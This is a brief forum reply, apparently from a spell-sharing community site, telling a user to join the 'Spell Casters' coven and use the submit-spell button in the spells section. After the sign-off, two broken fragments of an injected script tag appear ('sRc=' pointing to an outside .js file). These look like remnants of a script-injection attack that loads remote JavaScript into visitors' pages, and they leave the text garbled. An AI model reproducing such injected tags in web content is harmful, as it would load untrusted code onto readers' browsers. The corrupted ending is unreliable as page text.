The only coven that allows anyone go submit spells is Spell Casters. :) Here is more information about spells and the website.

You have to join the spellcasters coven first. Then if you go to the spells section up in the top right corner there is a submit spell button. Hope I helped! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
